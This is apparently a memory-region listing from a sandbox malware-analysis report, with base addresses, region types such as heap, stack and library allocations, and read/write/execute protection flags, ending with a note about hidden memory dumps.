page execute and read and write
2930000
trusted library allocation
page read and write
7D30000
trusted library allocation
page execute and read and write
8910000
trusted library allocation
page read and write
DA7000
heap
page read and write
8B0E000
stack
page read and write
4D03000
trusted library allocation
page read and write
2992000
heap
page read and write
7400000
heap
page read and write
A4F000
stack
page read and write
7200000
trusted library allocation
page read and write
815E000
stack
page read and write
5D3000
trusted library allocation
page execute and read and write
800000
heap
page read and write
8900000
trusted library allocation
page read and write
5619000
trusted library allocation
page read and write
E50000
heap
page read and write
795E000
stack
page read and write
36B7000
heap
page read and write
7837000
heap
page read and write
73DD000
stack
page read and write
3303000
trusted library allocation
page execute and read and write
44E7000
heap
page read and write
8CE0000
trusted library allocation
page read and write
4330000
remote allocation
page read and write
4BA5000
trusted library allocation
page execute and read and write
C3E000
stack
page read and write
732E000
stack
page read and write
780000
heap
page read and write
90F000
stack
page read and write
8DD0000
heap
page read and write
355D000
trusted library allocation
page execute and read and write
D60000
heap
page read and write
299D000
heap
page read and write
28F1000
heap
page read and write
34D6000
heap
page read and write
607A000
trusted library allocation
page read and write
7410000
trusted library allocation
page read and write
4CE9000
trusted library allocation
page read and write
3420000
heap
page read and write
8092000
heap
page read and write
36C7000
heap
page read and write
78DD000
heap
page read and write
4D02000
trusted library allocation
page read and write
950000
heap
page read and write
7D60000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
4F9F000
stack
page read and write
4D02000
trusted library allocation
page read and write
51B6000
trusted library allocation
page read and write
4D2E000
trusted library allocation
page read and write
2C10000
heap
page read and write
74AA000
stack
page read and write
7C10000
trusted library allocation
page read and write
7CF0000
trusted library allocation
page read and write
35E0000
heap
page read and write
77BE000
heap
page read and write
45CB000
trusted library allocation
page execute and read and write
35B0000
heap
page read and write
5000000
trusted library allocation
page read and write
6B7E000
stack
page read and write
3330000
heap
page read and write
4F80000
trusted library allocation
page read and write
7830000
heap
page read and write
2630000
heap
page read and write
4D14000
trusted library allocation
page read and write
5096000
direct allocation
page read and write
71E0000
trusted library allocation
page read and write
25A0000
remote allocation
page execute and read and write
47B0000
heap
page execute and read and write
2A21000
trusted library allocation
page read and write
8060000
heap
page read and write
58D7000
trusted library allocation
page read and write
299E000
heap
page read and write
844C000
stack
page read and write
790D000
heap
page read and write
708E000
stack
page read and write
7C67000
heap
page read and write
7B90000
trusted library allocation
page execute and read and write
4EA0000
trusted library allocation
page read and write
363D000
stack
page read and write
CAD000
stack
page read and write
A65000
heap
page read and write
6D82000
heap
page read and write
7E73000
trusted library allocation
page read and write
8E0D000
stack
page read and write
2D81000
heap
page read and write
7D8E000
stack
page read and write
4D53000
trusted library allocation
page read and write
3355000
heap
page read and write
6C2F000
heap
page read and write
7980000
trusted library allocation
page execute and read and write
7BF0000
trusted library allocation
page read and write
6AFD000
stack
page read and write
6DFE000
stack
page read and write
45B000
stack
page read and write
57E000
stack
page read and write
766C000
stack
page read and write
767D000
stack
page read and write
73AE000
stack
page read and write
4700000
trusted library allocation
page execute and read and write
4D4C000
trusted library allocation
page read and write
7F5E000
stack
page read and write
476E000
stack
page read and write
78A6000
heap
page read and write
4D00000
trusted library allocation
page read and write
72EE000
stack
page read and write
3555000
heap
page read and write
33F8000
heap
page read and write
7067000
heap
page read and write
752E000
stack
page read and write
36E8000
heap
page read and write
7C17000
heap
page read and write
8DE7000
heap
page read and write
7350000
trusted library allocation
page read and write
4D1E000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
809E000
stack
page read and write
789E000
stack
page read and write
5341000
trusted library allocation
page read and write
7BF0000
heap
page execute and read and write
6F4D000
stack
page read and write
8A4E000
stack
page read and write
78A3000
heap
page read and write
6C08000
heap
page read and write
8E7E000
stack
page read and write
87C0000
trusted library allocation
page read and write
47AE000
stack
page read and write
4E70000
heap
page execute and read and write
6F9BC000
unkown
page readonly
4EDE000
stack
page read and write
83B0000
trusted library allocation
page read and write
7042000
heap
page read and write
514E000
stack
page read and write
674E000
stack
page read and write
3562000
heap
page read and write
7AF4000
trusted library allocation
page read and write
5EAB000
trusted library allocation
page read and write
7B30000
trusted library allocation
page read and write
53C0000
trusted library allocation
page read and write
4B10000
trusted library allocation
page read and write
AE3000
trusted library allocation
page execute and read and write
2D98000
heap
page read and write
4912000
trusted library allocation
page read and write
8BEE000
stack
page read and write
52E5000
trusted library allocation
page read and write
7B20000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
4BC0000
trusted library allocation
page read and write
D9C000
stack
page read and write
2A9F000
stack
page read and write
2986000
trusted library allocation
page read and write
6D3E000
stack
page read and write
4D17000
trusted library allocation
page read and write
745000
trusted library allocation
page execute and read and write
8385000
trusted library allocation
page read and write
4540000
trusted library allocation
page read and write
4FF9000
trusted library allocation
page read and write
70B9000
heap
page read and write
3349000
trusted library allocation
page read and write
67CD000
stack
page read and write
34CA000
heap
page read and write
4BC000
stack
page read and write
4CF3000
trusted library allocation
page read and write
C84000
heap
page read and write
805E000
stack
page read and write
6F40000
heap
page read and write
3463000
trusted library allocation
page execute and read and write
6FE2000
trusted library allocation
page read and write
2AF5000
heap
page read and write
8064000
heap
page read and write
86CD000
stack
page read and write
2785000
heap
page read and write
70EF000
heap
page read and write
4FDC000
stack
page read and write
332D000
trusted library allocation
page execute and read and write
57B8000
trusted library allocation
page read and write
50FE000
heap
page read and write
514F000
heap
page read and write
2FA0000
heap
page read and write
552E000
trusted library allocation
page read and write
7E40000
trusted library allocation
page read and write
8090000
direct allocation
page read and write
663000
heap
page read and write
4CF8000
trusted library allocation
page read and write
5258000
trusted library allocation
page read and write
8F5000
heap
page read and write
690E000
stack
page read and write
5181000
trusted library allocation
page read and write
4A1F000
stack
page read and write
73A0000
trusted library allocation
page execute and read and write
749B000
stack
page read and write
728D000
stack
page read and write
3577000
heap
page read and write
B30000
heap
page read and write
7450000
trusted library allocation
page read and write
7A7D000
heap
page read and write
749E000
stack
page read and write
5D6000
heap
page read and write
290B000
heap
page read and write
C3C000
stack
page read and write
7AE000
stack
page read and write
7DF0000
trusted library allocation
page read and write
9014000
trusted library allocation
page read and write
4FC0000
heap
page read and write
52ED000
stack
page read and write
75F000
heap
page read and write
B10000
trusted library allocation
page read and write
4CF8000
trusted library allocation
page read and write
34C2000
heap
page read and write
B3A000
heap
page read and write
298D000
heap
page read and write
4B60000
heap
page readonly
5360000
heap
page read and write
5596000
trusted library allocation
page read and write
4330000
remote allocation
page read and write
6061000
trusted library allocation
page read and write
2998000
heap
page read and write
8B4E000
heap
page read and write
7A26000
heap
page read and write
44E000
stack
page read and write
5C0000
heap
page read and write
2F90000
heap
page read and write
4FE0000
heap
page read and write
7E0000
trusted library allocation
page read and write
D24000
heap
page read and write
4CEB000
trusted library allocation
page read and write
B52000
heap
page read and write
3342000
trusted library allocation
page read and write
83A000
stack
page read and write
299D000
heap
page read and write
32FC000
heap
page read and write
4D14000
trusted library allocation
page read and write
510D000
heap
page read and write
7370000
trusted library allocation
page read and write
8E79000
trusted library allocation
page read and write
44C0000
trusted library allocation
page read and write
4CE7000
trusted library allocation
page read and write
4D36000
trusted library allocation
page read and write
2C35000
heap
page read and write
4CE1000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
4D1C000
trusted library allocation
page read and write
7EA0000
trusted library allocation
page read and write
323C000
stack
page read and write
75ED000
stack
page read and write
4FD0000
trusted library allocation
page read and write
4CFA000
trusted library allocation
page read and write
53C4000
trusted library allocation
page read and write
8D0E000
stack
page read and write
1C0000
heap
page read and write
7430000
trusted library allocation
page read and write
32C8000
heap
page read and write
8C0000
heap
page read and write
78DB000
stack
page read and write
7B10000
trusted library allocation
page read and write
7180000
trusted library allocation
page read and write
43BE000
stack
page read and write
7CBE000
stack
page read and write
486E000
stack
page read and write
6F90000
trusted library allocation
page read and write
4E3B000
trusted library allocation
page execute and read and write
822000
trusted library allocation
page read and write
6589000
trusted library allocation
page read and write
6B4D000
stack
page read and write
562E000
stack
page read and write
570C000
trusted library allocation
page read and write
898D000
stack
page read and write
299E000
heap
page read and write
4E90000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
745C000
stack
page read and write
5DD000
trusted library allocation
page execute and read and write
79A1000
heap
page read and write
4C9E000
trusted library allocation
page read and write
6C70000
trusted library allocation
page read and write
94E000
stack
page read and write
7340000
trusted library allocation
page read and write
8B20000
heap
page read and write
4D20000
trusted library allocation
page read and write
6C3A000
stack
page read and write
5AA1000
trusted library allocation
page read and write
5010000
trusted library allocation
page read and write
D90000
trusted library allocation
page read and write
3500000
heap
page read and write
C20000
heap
page read and write
513D000
heap
page read and write
8CCF000
stack
page read and write
4D3C000
trusted library allocation
page read and write
5641000
trusted library allocation
page read and write
71A0000
trusted library allocation
page read and write
1010000
heap
page read and write
5640000
heap
page read and write
4D06000
trusted library allocation
page read and write
4720000
heap
page execute and read and write
5069000
trusted library allocation
page read and write
1680000
heap
page read and write
7450000
heap
page execute and read and write
8C0A000
trusted library allocation
page read and write
4DEB000
trusted library allocation
page read and write
72DE000
stack
page read and write
88F0000
trusted library allocation
page read and write
8F0000
heap
page read and write
419E000
stack
page read and write
490B000
trusted library allocation
page read and write
7A71000
heap
page read and write
356A000
heap
page read and write
8070000
direct allocation
page read and write
2D5B000
heap
page read and write
3476000
trusted library allocation
page read and write
99E000
stack
page read and write
4D29000
trusted library allocation
page read and write
3277000
stack
page read and write
6A65000
heap
page execute and read and write
551F000
trusted library allocation
page read and write
69FA000
stack
page read and write
3A21000
trusted library allocation
page read and write
5438000
stack
page read and write
AB4000
trusted library allocation
page read and write
7872000
heap
page read and write
741E000
stack
page read and write
7BCD000
heap
page read and write
2AF0000
heap
page read and write
7046000
heap
page read and write
6C5E000
heap
page read and write
4FC0000
heap
page read and write
756E000
stack
page read and write
7A8E000
heap
page read and write
6B0000
heap
page read and write
75EE000
stack
page read and write
4D15000
trusted library allocation
page read and write
667000
heap
page read and write
256B000
stack
page read and write
3554000
trusted library allocation
page read and write
4F75000
heap
page read and write
2BEA000
heap
page read and write
762D000
stack
page read and write
2978000
heap
page read and write
4EB4000
trusted library allocation
page read and write
4D08000
trusted library allocation
page read and write
299D000
heap
page read and write
D1D000
heap
page read and write
8790000
heap
page read and write
88F0000
trusted library allocation
page read and write
7DCE000
stack
page read and write
7E80000
trusted library allocation
page read and write
7DD0000
heap
page read and write
4CE1000
trusted library allocation
page read and write
7B0A000
trusted library allocation
page read and write
5710000
trusted library allocation
page read and write
578000
stack
page read and write
73F0000
trusted library allocation
page read and write
297B000
trusted library allocation
page read and write
3FF000
unkown
page read and write
4FD8000
trusted library allocation
page read and write
74B0000
heap
page read and write
4D44000
trusted library allocation
page read and write
7CA0000
trusted library allocation
page read and write
6A60000
heap
page execute and read and write
73C0000
heap
page read and write
34DE000
stack
page read and write
4CE8000
trusted library allocation
page read and write
4EA0000
heap
page read and write
4CF4000
trusted library allocation
page read and write
523C000
stack
page read and write
7130000
trusted library allocation
page read and write
752D000
stack
page read and write
4D03000
trusted library allocation
page read and write
58EE000
trusted library allocation
page read and write
6F32000
heap
page read and write
4D17000
trusted library allocation
page read and write
32EB000
heap
page read and write
323E000
stack
page read and write
6F9B2000
unkown
page execute read
6C70000
trusted library allocation
page read and write
71F2000
trusted library allocation
page read and write
7860000
heap
page execute and read and write
4B60000
heap
page read and write
There are 2453 hidden memdumps, click here to show them.